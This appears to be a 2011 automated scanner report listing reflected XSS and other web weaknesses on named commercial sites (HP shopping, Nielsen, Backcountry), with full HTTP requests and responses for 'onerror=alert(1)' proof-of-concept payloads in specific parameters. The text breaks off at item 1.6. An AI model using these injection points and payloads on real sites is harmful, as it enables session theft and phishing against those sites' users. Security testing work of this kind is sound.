XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09202011-01

Report generated by XSS.CX at Thu Sep 22 12:29:48 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/ce749a_main [REST URL parameter 5]

1.2. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/cn731a_main [REST URL parameter 5]

1.3. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]

1.4. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]

1.5. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter]

1.6. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter]

1.7. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [REST URL parameter 5]

1.8. http://nielsen.com/content/corporate/us/en/search.html [q parameter]

1.9. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html [caller parameter]

1.10. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 4]

1.11. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 5]

1.12. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 6]

1.13. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16 [REST URL parameter 7]

1.14. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 4]

1.15. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 5]

1.16. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 6]

1.17. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45 [REST URL parameter 7]

1.18. http://sales.liveperson.net/hc/9551721/ [msessionkey parameter]

1.19. http://www.backcountry.com/store/cart/add.html [mv_sku parameter]

1.20. http://www.shopping.hp.com/design [jumpid parameter]

1.21. http://www.shopping.hp.com/desktops [HHOJSID parameter]

1.22. http://www.shopping.hp.com/esp [HHOJSID parameter]

1.23. http://www.shopping.hp.com/printer [HHOJSID parameter]

1.24. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store [REST URL parameter 5]

1.25. http://www.shopping.hp.com/supplies [HHOJSID parameter]

1.26. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do [nextPage parameter]

1.27. http://www.shopping.hp.com/webapp/shopping/can.do [catLevel parameter]

1.28. http://www.shopping.hp.com/webapp/shopping/can.do [jumpid parameter]

1.29. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [PROD_LIST parameter]

1.30. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [lanAttr parameter]

1.31. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [landing parameter]

1.32. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [subcat1 parameter]

1.33. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.34. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.35. http://www.shopping.hp.com/webapp/shopping/product_detail.do [&subcat1 parameter]

1.36. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

1.37. http://www.shopping.hp.com/webapp/shopping/product_detail.do [catLevel parameter]

1.38. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.39. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.40. http://www.shopping.hp.com/webapp/shopping/product_detail.do [category parameter]

1.41. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.42. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.43. http://www.shopping.hp.com/webapp/shopping/product_detail.do [landing parameter]

1.44. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

1.45. http://www.shopping.hp.com/webapp/shopping/product_detail.do [mc parameter]

1.46. http://www.shopping.hp.com/webapp/shopping/product_detail.do [omniData parameter]

1.47. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

1.48. http://www.shopping.hp.com/webapp/shopping/product_detail.do [storeName parameter]

1.49. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.50. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.51. http://www.shopping.hp.com/webapp/shopping/product_detail.do [subcat1 parameter]

1.52. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.53. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.54. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.55. http://www.shopping.hp.com/webapp/shopping/product_detail.do [tab parameter]

1.56. http://www.shopping.hp.com/webapp/shopping/store_access.do [category parameter]

1.57. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

1.58. http://www.shopping.hp.com/webapp/shopping/store_access.do [jumpid parameter]

2. Session token in URL

2.1. http://sales.liveperson.net/hc/9551721/

2.2. http://www.backcountry.com/

2.3. http://www.backcountry.com/backcountry-gift-certificate-bcs0021

2.4. http://www.backcountry.com/mens-clothing

2.5. http://www.backcountry.com/prana-bliss-capri-pant-womens

2.6. http://www.backcountry.com/store/cart/add.html

2.7. http://www.backcountry.com/store/user.html

2.8. http://www.backcountry.com/womens-capri-pants

2.9. http://www.backcountry.com/womens-clothing

3. Cookie scoped to parent domain

3.1. http://www.backcountry.com/store/BCS0021

3.2. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

3.3. http://www.shopping.hp.com/design

3.4. http://www.shopping.hp.com/desktops

3.5. http://www.shopping.hp.com/esp

3.6. http://www.shopping.hp.com/go/microsoftoffers

3.7. http://www.shopping.hp.com/go/touchpadfaqs

3.8. http://www.shopping.hp.com/printer

3.9. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

3.10. http://www.shopping.hp.com/supplies

3.11. http://www.shopping.hp.com/webapp/shopping/can.do

3.12. http://www.shopping.hp.com/webapp/shopping/home.do

3.13. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

3.14. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

3.15. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

3.16. http://www.shopping.hp.com/webapp/shopping/product_detail.do

3.17. http://www.shopping.hp.com/webapp/shopping/search_request.do

3.18. http://www.shopping.hp.com/webapp/shopping/series_can.do

3.19. http://www.shopping.hp.com/webapp/shopping/store_access.do

4. Cookie without HttpOnly flag set

4.1. http://www.backcountry.com/mens-clothing

4.2. http://www.backcountry.com/store/BCS0021

4.3. http://www.backcountry.com/store/PRA0870/Bliss-Capri-Pant-Womens.html

4.4. http://www.backcountry.com/store/cart/add.html

4.5. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html

4.6. http://www.backcountry.com/store/user.html

4.7. http://nielsen.com/bin/statistics/tracker/query

4.8. http://nielsen.com/bin/statistics/tracker/result

4.9. http://nielsen.com/content/corporate/us/en/_jcr_content/logogeneric.limg.png/1291333524989.png

4.10. http://nielsen.com/content/corporate/us/en/measurement/online-measurement/_jcr_content/bannerPar/image.img.jpg/1314307161790.jpg

4.11. http://nielsen.com/content/corporate/us/en/measurement/television-measurement/_jcr_content/bannerPar/image.img.jpg/1314308133299.jpg

4.12. http://nielsen.com/content/corporate/us/en/search.html

4.13. http://nielsen.com/content/corporate/us/en/search/_jcr_content/par.autocomp.html

4.14. http://nielsen.com/content/cus_config/favicons/corporate/us/en/favicon.ico

4.15. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1pxGradient_blue.gif

4.16. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/1px_gray_gradient_bkg.png

4.17. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/blue-arrow-on-gray.png

4.18. http://nielsen.com/content/dam/corporate/shared/images/backgrounds/right_arrow.png

4.19. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/email-link.gif

4.20. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/facebook.gif

4.21. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/linkedin.gif

4.22. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/search.png

4.23. http://nielsen.com/content/dam/corporate/shared/images/icons/misc_icons/twit.gif

4.24. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/goldKey.gif

4.25. http://nielsen.com/content/dam/corporate/us/en/graphix/icons/world_icon.gif

4.26. http://nielsen.com/content/dam/css/corporate/addons.css

4.27. http://nielsen.com/content/dam/css/corporate/clearfix.css

4.28. http://nielsen.com/etc/clientlibs/foundation/jquery.js

4.29. http://nielsen.com/etc/clientlibs/foundation/librarymanager.js

4.30. http://nielsen.com/etc/clientlibs/foundation/shared.js

4.31. http://nielsen.com/etc/designs/corporate.css

4.32. http://nielsen.com/etc/designs/corporate/additions.css

4.33. http://nielsen.com/etc/designs/corporate/clientlibs.css

4.34. http://nielsen.com/etc/designs/corporate/clientlibs.js

4.35. http://nielsen.com/etc/designs/corporate/clientlibs/themes/default.css

4.36. http://nielsen.com/etc/designs/corporate/cq.css

4.37. http://nielsen.com/etc/designs/corporate/images/bullet-n3.gif

4.38. http://nielsen.com/etc/designs/corporate/images/default.gif

4.39. http://nielsen.com/etc/designs/corporate/images/pix.gif

4.40. http://nielsen.com/etc/designs/corporate/images/topnav/navFirst.gif

4.41. http://nielsen.com/etc/designs/corporate/images/topnav/navGround.gif

4.42. http://nielsen.com/etc/designs/corporate/images/topnav/navNormal.gif

4.43. http://nielsen.com/etc/designs/corporate/nielsencustom.css

4.44. http://nielsen.com/etc/designs/corporate/pagelayout.css

4.45. http://nielsen.com/etc/designs/corporate/reset.css

4.46. http://nielsen.com/etc/designs/corporate/static.css

4.47. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery-1.3.2.min.js

4.48. http://nielsen.com/etc/designs/corporate/static/js/autocomp/jquery.autocomplete-min.js

4.49. http://nielsen.com/etc/designs/corporate/static/js/horzNav.js

4.50. http://nielsen.com/etc/designs/corporate/static/js/nielsenJs.js

4.51. http://nielsen.com/etc/designs/corporate/topnav.css

4.52. http://nielsen.com/favicon.ico

4.53. http://nielsen.com/libs/cq/personalization/components/clickstreamcloud/content/config.json

4.54. http://nielsen.com/us/en/insights/press-room/2008/nielsen_reports_tv.html

4.55. http://nielsen.com/us/en/measurement/online-measurement.html

4.56. http://nielsen.com/us/en/measurement/television-measurement.html

4.57. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

4.58. http://sales.liveperson.net/hc/9551721/

4.59. http://www.shopping.hp.com/design

4.60. http://www.shopping.hp.com/desktops

4.61. http://www.shopping.hp.com/esp

4.62. http://www.shopping.hp.com/go/microsoftoffers

4.63. http://www.shopping.hp.com/go/touchpadfaqs

4.64. http://www.shopping.hp.com/printer

4.65. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

4.66. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

4.67. http://www.shopping.hp.com/supplies

4.68. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do

4.69. http://www.shopping.hp.com/webapp/shopping/can.do

4.70. http://www.shopping.hp.com/webapp/shopping/home.do

4.71. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

4.72. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

4.73. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

4.74. http://www.shopping.hp.com/webapp/shopping/product_detail.do

4.75. http://www.shopping.hp.com/webapp/shopping/search_request.do

4.76. http://www.shopping.hp.com/webapp/shopping/series_can.do

4.77. http://www.shopping.hp.com/webapp/shopping/store_access.do

5. Password field with autocomplete enabled

5.1. http://www.backcountry.com/store/user.html

5.2. http://www.backcountry.com/store/user.html

6. Cross-domain POST

6.1. http://www.shopping.hp.com/design

6.2. http://www.shopping.hp.com/desktops

6.3. http://www.shopping.hp.com/esp

6.4. http://www.shopping.hp.com/printer

6.5. http://www.shopping.hp.com/supplies

6.6. http://www.shopping.hp.com/webapp/shopping/home.do

6.7. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

6.8. http://www.shopping.hp.com/webapp/shopping/product_detail.do

6.9. http://www.shopping.hp.com/webapp/shopping/series_can.do

6.10. http://www.shopping.hp.com/webapp/shopping/store_access.do

6.11. http://www.shopping.hp.com/webapp/shopping/store_access.do

7. Cross-domain Referer leakage

7.1. http://nielsen.com/content/corporate/us/en/search.html

7.2. http://nielsen.com/us/en/practices/cross-platform-audience-behavior.html

7.3. http://www.backcountry.com/store/cart/add.html

7.4. http://www.shopping.hp.com/design

7.5. http://www.shopping.hp.com/desktops

7.6. http://www.shopping.hp.com/esp

7.7. http://www.shopping.hp.com/go/microsoftoffers

7.8. http://www.shopping.hp.com/go/touchpadfaqs

7.9. http://www.shopping.hp.com/printer

7.10. http://www.shopping.hp.com/shopping/html/popup/mtfs_webdetails_master.html

7.11. http://www.shopping.hp.com/supplies

7.12. http://www.shopping.hp.com/webapp/shopping/can.do

7.13. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

7.14. http://www.shopping.hp.com/webapp/shopping/product_detail.do

7.15. http://www.shopping.hp.com/webapp/shopping/search_request.do

7.16. http://www.shopping.hp.com/webapp/shopping/series_can.do

7.17. http://www.shopping.hp.com/webapp/shopping/store_access.do

7.18. http://www.shopping.hp.com/webapp/shopping/store_access.do

8. Cross-domain script include

8.1. http://www.backcountry.com/

8.2. http://www.backcountry.com/backcountry-gift-certificate-bcs0021

8.3. http://www.backcountry.com/mens-clothing

8.4. http://www.backcountry.com/prana-bliss-capri-pant-womens

8.5. http://www.backcountry.com/store/cart/add.html

8.6. http://www.backcountry.com/store/user.html

8.7. http://www.backcountry.com/womens-capri-pants

8.8. http://www.backcountry.com/womens-clothing

8.9. http://www.shopping.hp.com/design

8.10. http://www.shopping.hp.com/desktops

8.11. http://www.shopping.hp.com/esp

8.12. http://www.shopping.hp.com/go/microsoftoffers

8.13. http://www.shopping.hp.com/go/touchpadfaqs

8.14. http://www.shopping.hp.com/printer

8.15. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store

8.16. http://www.shopping.hp.com/shopping/html/popup/mtfs_webdetails_master.html

8.17. http://www.shopping.hp.com/supplies

8.18. http://www.shopping.hp.com/webapp/shopping/can.do

8.19. http://www.shopping.hp.com/webapp/shopping/home.do

8.20. http://www.shopping.hp.com/webapp/shopping/mpss_portal.do

8.21. http://www.shopping.hp.com/webapp/shopping/product_advisor.do

8.22. http://www.shopping.hp.com/webapp/shopping/product_comparison.do

8.23. http://www.shopping.hp.com/webapp/shopping/product_detail.do

8.24. http://www.shopping.hp.com/webapp/shopping/search_request.do

8.25. http://www.shopping.hp.com/webapp/shopping/series_can.do

8.26. http://www.shopping.hp.com/webapp/shopping/store_access.do

8.27. http://www.shopping.hp.com/webapp/shopping/store_access.do

9. TRACE method is enabled

10. Email addresses disclosed

10.1. http://www.backcountry.com/prana-bliss-capri-pant-womens

10.2. http://www.backcountry.com/store/user.html

11. Robots.txt file

12. HTML does not specify charset

12.1. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

12.2. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

13. Content type incorrectly stated

13.1. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/button_bg_mpr.gif

13.2. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/sitewide_offers_bg.gif

13.3. http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/products/mp8_70.gif

13.4. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10006@x16

13.5. http://oascentral.feedroom.com/RealMedia/ads/adstream_sx.ads/hpproserv.com/hpscaleshare/personalcomputingadvancements/10098@x45

13.6. http://oascentral.feedroom.com/favicon.ico

13.7. http://sales.liveperson.net/hcp/html/mTag.js

13.8. http://www.backcountry.com/js/global/highslide/graphics/zoomin.cur

13.9. http://www.backcountry.com/js/global/highslide/graphics/zoomout.cur

13.10. http://www.backcountry.com/store/cart/ajax/check_cart_reload_needed.html

13.11. http://www.shopping.hp.com/webapp/shopping/hho_cart.do

13.12. http://www.shopping.hp.com/webapp/shopping/product_advisor_ajax.do



1. Cross-site scripting (reflected)
There are 58 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/ce749a_main [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/ce749a_main

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3be37<img%20src%3da%20onerror%3dalert(1)>7312d097c94 was submitted in the REST URL parameter 5. This input was echoed as 3be37<img src=a onerror=alert(1)>7312d097c94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/ce749a_main3be37<img%20src%3da%20onerror%3dalert(1)>7312d097c94?$featured_fmt$ HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://search.hp.com/query.html?qt=xss+printer&charset=iso-8859-1&la=en&hpvc=HHOid&qs=&nh=10&lk=1&rf=0&uf=1&qp=url%3Ahttp&hps=Home+%26+Home+Office&hpn=Return+to+Home+%26+Home+Office&hpr=http%3A%2F%2Fwww.shopping.hp.com%2Fwebapp%2Fshopping%2Fhome.do&hpa=http%3A%2F%2Fwww.homeandoffice.hp.com%2Fhho%2Fus%2Fen%2Fcontact_hp.html&hph=&hpl=1&hpo=hphqhhomktg&h_audience=hho&h_audiencerestrict=&st=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 82
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:55:19 GMT
Date: Thu, 22 Sep 2011 00:55:19 GMT
Connection: close

Unable to find /HPShopping/ce749a_main3be37<img src=a onerror=alert(1)>7312d097c94

1.2. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/cn731a_main [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/cn731a_main

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 10844<img%20src%3da%20onerror%3dalert(1)>6dd168a1ea was submitted in the REST URL parameter 5. This input was echoed as 10844<img src=a onerror=alert(1)>6dd168a1ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/cn731a_main10844<img%20src%3da%20onerror%3dalert(1)>6dd168a1ea?$preview_fmt$ HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 81
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 01:08:20 GMT
Date: Thu, 22 Sep 2011 01:08:20 GMT
Connection: close

Unable to find /HPShopping/cn731a_main10844<img src=a onerror=alert(1)>6dd168a1ea

1.3. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$bg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $bg request parameter is copied into the HTML document as plain text between tags. The payload a1f2e<img%20src%3da%20onerror%3dalert(1)>90fc7708bbe was submitted in the $bg parameter. This input was echoed as a1f2e<img src=a onerror=alert(1)>90fc7708bbe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1a1f2e<img%20src%3da%20onerror%3dalert(1)>90fc7708bbe HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:59 GMT
Date: Thu, 22 Sep 2011 00:54:59 GMT
Connection: close

Unable to find /HPShopping/HPShopping/wbg1a1f2e<img src=a onerror=alert(1)>90fc7708bbe

1.4. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$dt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $dt request parameter is copied into the HTML document as plain text between tags. The payload e109d<img%20src%3da%20onerror%3dalert(1)>a54868bbeea was submitted in the $dt parameter. This input was echoed as e109d<img src=a onerror=alert(1)>a54868bbeea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7De109d<img%20src%3da%20onerror%3dalert(1)>a54868bbeea&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 86
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:58 GMT
Date: Thu, 22 Sep 2011 00:54:58 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/}e109d<img src=a onerror=alert(1)>a54868bbeea

1.5. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$fti parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hpshopping.speedera.net
Path:   /s7d2.scene7.com/is/image/HPShopping/promo3_tile

Issue detail

The value of the $fti request parameter is copied into the HTML document as plain text between tags. The payload 1b9f8<img%20src%3da%20onerror%3dalert(1)>16f60277da7 was submitted in the $fti parameter. This input was echoed as 1b9f8<img src=a onerror=alert(1)>16f60277da7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /s7d2.scene7.com/is/image/HPShopping/promo3_tile?layer=comp&wid=258&hei=130&$hdl2=&$hdl1=Save%20up%20to%20%24340&$hlc1=&$bdc1=on%2023%2Dinch%20Touch%20PC%20with%20free%20upgrade%20to%201%2E5TB%20hard%20drive%2C%20a%20TV%20tuner%2C%20and%20Beats%20Audio%E2%84%A2&$hlc2=&$bdc2=&$ftc=&$fti=is%7BHPShopping%2Fqb911av%5Fmain%7D1b9f8<img%20src%3da%20onerror%3dalert(1)>16f60277da7&$mon=is%7BHPShopping%2F%7D&$dt=is%7BHPShopping%2F%7D&$bg=HPShopping%2Fwbg1 HTTP/1.1
Host: hpshopping.speedera.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Content-Type: text/plain
Content-Length: 98
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 22 Sep 2011 00:54:55 GMT
Date: Thu, 22 Sep 2011 00:54:55 GMT
Connection: close

Unable to find /HPShopping/is{HPShopping/qb911av_main}1b9f8<img src=a onerror=alert(1)>16f60277da7

1.6. http://hpshopping.speedera.net/s7d2.scene7.com/is/image/HPShopping/promo3_tile [$mon parameter]

Summary

Severity:   High
